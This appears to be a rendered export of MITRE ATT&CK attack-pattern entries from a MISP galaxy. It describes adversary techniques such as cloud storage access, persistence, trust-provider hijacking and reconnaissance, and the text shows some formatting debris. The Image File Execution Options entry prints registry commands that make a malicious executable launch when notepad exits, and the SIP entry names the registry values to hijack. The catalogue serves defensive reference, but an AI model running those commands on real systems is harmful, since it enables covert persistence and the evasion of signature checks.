The tag is: misp-galaxy:mitre-attack-pattern="Analyze presence of outsourced capabilities - T1303"

Data from Cloud Storage Object - T1530

Adversaries may access data objects from improperly secured cloud storage.

Many cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider’s APIs. Solution providers typically offer security guides to help end users configure systems.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019)

Misconfiguration by end users is a common problem. There have been numerous incidents where cloud storage has been improperly secured (typically by unintentionally allowing public access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017) Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls.

The tag is: misp-galaxy:mitre-attack-pattern="Data from Cloud Storage Object - T1530"
Boot or Logon Initialization Scripts - T1037

Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely.

Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.

An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.

The tag is: misp-galaxy:mitre-attack-pattern="Boot or Logon Initialization Scripts - T1037"

Table 2989. Table References

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<td><a href="https://capec.mitre.org/data/definitions/564.html">https://capec.mitre.org/data/definitions/564.html</a></td>
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Data from Network Shared Drive - T1039

Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.

The tag is: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039"

Table 2990. Table References

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<td><a href="https://capec.mitre.org/data/definitions/639.html">https://capec.mitre.org/data/definitions/639.html</a></td>
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Download New Code at Runtime - T1407

An app could download and execute dynamic code (not included in the original application package) after installation to evade static analysis techniques (and potentially dynamic analysis techniques) used for application vetting or application store review. (Citation: Poeplau-ExecuteThis)

On Android, dynamic code could include native code, Dalvik code, or JavaScript code that uses the Android WebView’s JavascriptInterface capability. (Citation: Bromium-AndroidRCE)

On iOS, techniques also exist for executing dynamic code downloaded after application installation. (Citation: FireEye-JSPatch) (Citation: Wang)

The tag is: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407"

Table 2991. Table References

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Windows Management Instrumentation Event Subscription - T1084

Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may attempt to evade detection of this technique by compiling WMI scripts into Windows Management Object (MOF) files (.mof extension). (Citation: Dell WMI Persistence) Examples of events that may be subscribed to are the wall clock time or the computer’s uptime. (Citation: Kazanciyan 2014) Several threat groups have reportedly used this technique to maintain persistence. (Citation: Mandiant M-Trends 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1084"

Windows Management Instrumentation Event Subscription - T1084 has relationships with:


Table 2992. Table References

Links
Custom Command and Control Protocol - T1094

Adversaries may communicate using a custom command and control protocol instead of encapsulating commands/data in an existing [Standard Application Layer Protocol](https://attack.mitre.org/techniques/T1071). Implementations include mimicking well-known protocols or developing custom protocols (including raw sockets) on top of fundamental protocols provided by TCP/IP/another standard network stack.

The tag is: `misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094"`

Custom Command and Control Protocol - T1094 has relationships with:


Table 2993. Table References

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Trusted Developer Utilities Proxy Execution - T1127

Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.

The tag is: `misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127"

Table 2994. Table References

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App Delivered via Web Download - T1431

The application is downloaded from an arbitrary web site. A link to the application’s download URI may be sent in an email or SMS, placed on another web site that the target is likely to view, or sent via other means (such as QR code).

Detection: An EMM/MDM or mobile threat protection solution can identify the presence of unwanted, known insecure, or malicious apps on devices.

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="App Delivered via Web Download - T1431"

App Delivered via Web Download - T1431 has relationships with:

• revoked-by: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

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Image File Execution Options Injection - T1183

Image File Execution Options (IFEO) enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., “C:\dbg\ntsd.exe -g notepad.exe”). (Citation: Microsoft Dev Blog IFEO Mar 2010)

IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as <code>Debugger</code> values in the Registry under <code>HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<executable></code> where <code><executable></code> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)

IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IEFO and silent process exit Registry values in <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\</code>
NT\CurrentVersion\SilentProcessExit</code>. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)

An example where the evil.exe process is started when notepad.exe exits: (Citation: Oddvar Moe IFEO APR 2018)

- `<code>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512</code>`
- `<code>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1</code>`
- `<code>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe"</code>`

Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Endgame Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous invocation.

Malware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)

The tag is: `misp-galaxy:mitre-attack-pattern="Image File Execution Options Injection - T1183"

Image File Execution Options Injection - T1183 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Image File Execution Options Injection - T1546.012"` with estimative-language:likelihood-probability="almost-certain"

Table 2996. Table References

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1245
SIP and Trust Provider Hijacking - T1198

In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file’s origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)

Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)

Similar to [Code Signing](https://attack.mitre.org/techniques/T1116), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and whitelisting tools to classify malicious (or any) code as signed by:

- Modifying the `<code>Dll</code>` and `<code>FuncName</code>` Registry values in `<code>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDlGetSignedDataMsg{SIP_GUID}</code>` that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDlGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).

- Modifying the `<code>Dll</code>` and `<code>FuncName</code>` Registry values in `<code>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDlVerifyIndirectData{SIP_GUID}</code>` that point to the DLL providing a SIP’s CryptSIPDlVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDlGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.

- Modifying the `<code>DLL</code>` and `<code>Function</code>` Registry values in `<code>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy

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\{trust provider GUID\} that point to the DLL providing a trust provider's FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP's CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).

- **Note**: The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).

Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)

The tag is: `misp-galaxy:mitre-attack-pattern="SIP and Trust Provider Hijacking - T1198"

SIP and Trust Provider Hijacking - T1198 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="SIP and Trust Provider Hijacking - T1553.003"`
  with estimative-language:likelihood-probability="almost-certain"

**Table 2997. Table References**

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**File and Directory Permissions Modification - T1222**

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files. (Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory's existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).

The tag is: **misp-galaxy:mitre-attack-pattern="File and Directory Permissions Modification - T1222"**

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  ntId=100                                                             |
| https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environme
  ntId=110                                                             |
| https://www.eventtracker.com/tech-articles/monitoring-file-permission
  -changes-windows-security-log/                                       |

### Assess leadership areas of interest - T1224

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1224).

Leadership assesses the areas of most interest to them and generates Key Intelligence Topics (KIT) or Key Intelligence Questions (KIQ). For example, an adversary knows from open and closed source reporting that cyber is of interest, resulting in it being a KIT. (Citation: ODNIIntegration)

The tag is: **misp-galaxy:mitre-attack-pattern="Assess leadership areas of interest - T1224"**

### Table 2999. Table References

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### Determine 3rd party infrastructure services - T1284

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1284).
A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available as 3rd party infrastructure services. These services could provide an adversary with another avenue of approach or compromise. (Citation: LUCKYCAT2012) (Citation: Schneier-cloud) (Citation: Computerworld-suppliers)

The tag is: misp-galaxy:mitre-attack-pattern="Determine 3rd party infrastructure services - T1284"

Determine 3rd party infrastructure services - T1284 has relationships with:

- related-to: misp-galaxy:mitre-attack-pattern="Determine 3rd party infrastructure services - T1260" with estimative-language:likelihood-probability="almost-certain"

Table 3000. Table References

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**Determine highest level tactical element - T1243**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1243).

From a tactical viewpoint, an adversary could potentially have a primary and secondary level target. The primary target represents the highest level tactical element the adversary wishes to attack. For example, the corporate network within a corporation or the division within an agency. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Determine highest level tactical element - T1243"

Table 3001. Table References

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**Determine secondary level tactical element - T1244**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1244).

The secondary level tactical element the adversary seeks to attack is the specific network or area of a network that is vulnerable to attack. Within the corporate network example, the secondary level tactical element might be a SQL server or a domain controller with a known vulnerability. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Determine secondary level tactical element - T1244"

Table 3002. Table References
Attack PC via USB Connection - T1427

With escalated privileges, an adversary could program the mobile device to impersonate USB devices such as input devices (keyboard and mouse), storage devices, and/or networking devices in order to attack a physically connected PC (Citation: Wang-ExploitingUSB)(Citation: ArsTechnica-PoisonTap) This technique has been demonstrated on Android. We are unaware of any demonstrations on iOS.

The tag is: misp-galaxy:mitre-attack-pattern="Attack PC via USB Connection - T1427"

Table 3003. Table References

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<td><a href="http://dl.acm.org/citation.cfm?id=1920314">http://dl.acm.org/citation.cfm?id=1920314</a></td>
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Determine centralization of IT management - T1285

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1285).

Determining if a "corporate" help desk exists, the degree of access and control it has, and whether there are "edge" units that may have different support processes and standards. (Citation: SANSCentralizeManagement)

The tag is: misp-galaxy:mitre-attack-pattern="Determine centralization of IT management - T1285"

Table 3004. Table References

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Determine external network trust dependencies - T1259

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1259).
Network trusts enable communications between different networks with specific accesses and permissions. Network trusts could include the implementation of domain trusts or the use of virtual private networks (VPNs). (Citation: CuckoosEgg) (Citation: CuckoosEggWikipedia) (Citation: KGBComputerMe)

The tag is: misp-galaxy:mitre-attack-pattern="Determine external network trust dependencies - T1259"

Table 3005. Table References

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**Analyze organizational skillsets and deficiencies - T1297**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1297).

Understanding organizational skillsets and deficiencies could provide insight into weakness in defenses, or opportunities for exploitation. (Citation: FakeLinkedIn)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1297"

Analyze organizational skillsets and deficiencies - T1297 has relationships with:

- related-to: misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1289" with estimative-language:likelihood-probability="almost-certain"

Table 3006. Table References

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**Analyze architecture and configuration posture - T1288**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1288).

An adversary may analyze technical scanning results to identify weaknesses in the configuration or architecture of a victim network. These weaknesses could include architectural flaws, misconfigurations, or improper security controls. (Citation: FireEyeAPT28)
Table 3007. Table References

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**Analyze organizational skillsets and deficiencies - T1289**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1289).

Analyze strengths and weaknesses of the target for potential areas of where to focus compromise efforts. (Citation: FakeLinkedIn)

The tag is: `misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1289"`

Analyze organizational skillsets and deficiencies - T1289 has relationships with:

- related-to: `misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1297"` with estimative-language:likelihood-probability="almost-certain"

Table 3008. Table References

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**Leverage compromised 3rd party resources - T1375**

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

The utilization of resources not owned by the adversary to launch exploits or operations. This includes utilizing equipment that was previously compromised or leveraging access gained by other methods (such as compromising an employee at a business partner location). (Citation: CitizenLabGreatCannon)

The tag is: `misp-galaxy:mitre-attack-pattern="Leverage compromised 3rd party resources - T1375"`

Table 3009. Table References

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<td><a href="https://attack.mitre.org/techniques/T1375">https://attack.mitre.org/techniques/T1375</a></td>
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</table>
Procure required equipment and software - T1335

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1335).

An adversary will require some physical hardware and software. They may only need a lightweight set-up if most of their activities will take place using on-line infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems. (Citation: NYTStuxnet)

The tag is: `misp-galaxy:mitre-attack-pattern="Procure required equipment and software - T1335"`

### Table 3010. Table References

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SSL certificate acquisition for domain - T1337

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1337).

Certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. Acquiring a certificate for a domain name similar to one that is expected to be trusted may allow an adversary to trick a user in to trusting the domain (e.g., vvachovia instead of [Wachovia](https://www.wellsfargo.com/about/corporate/wachovia) homoglyphs). (Citation: SubvertSSL) (Citation: PaypalScam)

The tag is: `misp-galaxy:mitre-attack-pattern="SSL certificate acquisition for domain - T1337"

### Table 3011. Table References

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<td><a href="https://attack.mitre.org/techniques/T1337">https://attack.mitre.org/techniques/T1337</a></td>
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</table>
Confirmation of launched compromise achieved - T1383

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Upon successful compromise the adversary may implement methods for confirming success including communication to a command and control server, exfiltration of data, or a verifiable intended effect such as a publicly accessible resource being inaccessible or a web page being defaced. (Citation: FireEye Malware Stages) (Citation: APTNetworkTrafficAnalysis)

The tag is: misp-galaxy:mitre-attack-pattern="Confirmation of launched compromise achieved - T1383"

Table 3012. Table References

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<td><a href="https://attack.mitre.org/techniques/T1383">https://attack.mitre.org/techniques/T1383</a></td>
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App Delivered via Email Attachment - T1434

The application is delivered as an email attachment.

Detection: An EMM/MDM or mobile threat protection solution can identify the presence of unwanted, known insecure, or malicious apps on devices. Enterprise email security solutions can identify the presence of Android or iOS application packages within email messages.

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="App Delivered via Email Attachment - T1434"

App Delivered via Email Attachment - T1434 has relationships with:


Table 3013. Table References

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<td><a href="https://attack.mitre.org/techniques/T1434">https://attack.mitre.org/techniques/T1434</a></td>
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Create or Modify System Process - T1543

Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services. (Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch
Agent(https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons)

Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect.

Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges. (Citation: OSX Malware Detection).

The tag is: *misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543”*

*Table 3014. Table References*

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<td><a href="https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html">https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html</a></td>
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**Build and configure delivery systems - T1347**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1347).

Delivery systems are the infrastructure used by the adversary to host malware or other tools used during exploitation. Building and configuring delivery systems may include multiple activities such as registering domain names, renting hosting space, or configuring previously exploited environments. (Citation: APT1)

The tag is: *misp-galaxy:mitre-attack-pattern="Build and configure delivery systems - T1347”*

*Table 3015. Table References*

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**Automated system performs requested action - T1384**

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Users may be performing legitimate activity but using media that is compromised (e.g., using a USB drive that comes with malware installed during manufacture or supply). Upon insertion in the system the media auto-runs and the malware executes without further action by the user. (Citation: 1255
The tag is: **misp-galaxy:mitre-attack-pattern="Automated system performs requested action - T1384"**

**Table 3016. Table References**

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**Eavesdrop on Insecure Network Communication - T1439**

If network traffic between the mobile device and remote servers is unencrypted or is encrypted in an insecure manner, then an adversary positioned on the network can eavesdrop on communication. (Citation: mHealth)

The tag is: **misp-galaxy:mitre-attack-pattern="Eavesdrop on Insecure Network Communication - T1439"**

**Table 3017. Table References**

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<td><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-0.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-0.html</a></td>
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**Distribute malicious software development tools - T1394**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1394).

An adversary could distribute malicious software development tools (e.g., compiler) that hide malicious behavior in software built using the tools. (Citation: PA XcodeGhost) (Citation: Reflections on Trusting Trust)

The tag is: **misp-galaxy:mitre-attack-pattern="Distribute malicious software development tools - T1394"**

**Table 3018. Table References**

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Transfer Data to Cloud Account - T1537

Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection.

A defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.

Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018)

The tag is: misp-galaxy:mitre-attack-pattern="Transfer Data to Cloud Account - T1537"

Table 3019. Table References

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Review logs and residual traces - T1358

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1358).

Execution of code and network communications often result in logging or other system or network forensic artifacts. An adversary can run their code to identify what is recorded under different conditions. This may result in changes to their code or adding additional actions (such as deleting a record from a log) to the code. (Citation: EDB-39007) (Citation: infosec-covering-tracks)

The tag is: misp-galaxy:mitre-attack-pattern="Review logs and residual traces - T1358"

Table 3020. Table References

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Runtime code download and execution - T1395

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Many mobile devices are configured to only allow applications to be installed from the mainstream vendor app stores (e.g., Apple App Store and Google Play Store). These app stores scan submitted
applications for malicious behavior. However, applications can evade these scans by downloading and executing new code at runtime that was not included in the original application package. (Citation: Fruit vs Zombies) (Citation: Android Hax) (Citation: Execute This!) (Citation: HT Fake News App) (Citation: Anywhere Computing kill 2FA) (Citation: Android Security Review 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Runtime code download and execution - T1395"

Test malware to evade detection - T1359

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1359).

An adversary can run their code on systems with cyber security protections, such as antivirus products, in place to see if their code is detected. They can also test their malware on freely available public services. (Citation: MalwareQAZirtest)

The tag is: misp-galaxy:mitre-attack-pattern="Test malware to evade detection - T1359"

Replace legitimate binary with malware - T1378

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Replacing a legitimate binary with malware can be accomplished either by replacing a binary on a legitimate download site or standing up a fake or alternative site with the malicious binary. The intent is to have a user download and run the malicious binary thereby executing malware. (Citation: FSecureICS)

The tag is: misp-galaxy:mitre-attack-pattern="Replace legitimate binary with malware - T1378"

Compromise of externally facing system - T1388

This technique has been deprecated. Please use [Exploit Public-Facing...](http://attack.mitre.org/techniques...)

Table 3021. Table References

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<td><a href="https://attack.mitre.org/techniques/T1378">https://attack.mitre.org/techniques/T1378</a></td>
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Externally facing systems allow connections from outside the network as a normal course of operations. Externally facing systems may include, but are not limited to, websites, web portals, email, DNS, FTP, VPN concentrators, and border routers and firewalls. These systems could be in a demilitarized zone (DMZ) or may be within other parts of the internal environment. (Citation: CylanceOpCleaver) (Citation: DailyTechAntiSec)

The tag is: `misp-galaxy:mitre-attack-pattern="Compromise of externally facing system - T1388"`

### Jamming or Denial of Service - T1464

An attacker could jam radio signals (e.g. Wi-Fi, cellular, GPS) to prevent the mobile device from communicating. (Citation: NIST-SP800187)(Citation: CNET-Celljammer)(Citation: NYTimes-Celljam)(Citation: Digitaltrends-Celljam)(Citation: Arstechnica-Celljam)

The tag is: `misp-galaxy:mitre-attack-pattern="Jamming or Denial of Service - T1464"`

### Boot or Logon Autostart Execution - T1547

Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account
These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.

Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.

**The tag is:** *misp-galaxy:mitre-attack-pattern="Boot or Logon Autostart Execution - T1547"*

**Table 3026. Table References**

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**Remotely Track Device Without Authorization - T1468**

An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud services (e.g. Google's Android Device Manager or Apple iCloud's Find my iPhone) or to an enterprise mobility management (EMM) / mobile device management (MDM) server console could use that access to track mobile devices. *(Citation: Krebs-Location)*

**The tag is:** *misp-galaxy:mitre-attack-pattern="Remotely Track Device Without Authorization - T1468"*

**Table 3027. Table References**

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<td><a href="https://attack.mitre.org/techniques/T1468">https://attack.mitre.org/techniques/T1468</a></td>
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</table>
Remotely Wipe Data Without Authorization - T1469

An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud services (e.g. Google's Android Device Manager or Apple iCloud's Find my iPhone) or to an EMM console could use that access to wipe enrolled devices (Citation: Honan-Hacking).

The tag is: misp-galaxy:mitre-attack-pattern="Remotely Wipe Data Without Authorization - T1469"

Table 3028. Table References

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Install Insecure or Malicious Configuration - T1478

An adversary could attempt to install insecure or malicious configuration settings on the mobile device, through means such as phishing emails or text messages either directly containing the configuration settings as an attachment, or containing a web link to the configuration settings. The device user may be tricked into installing the configuration settings through social engineering techniques (Citation: Symantec-iOSProfile).

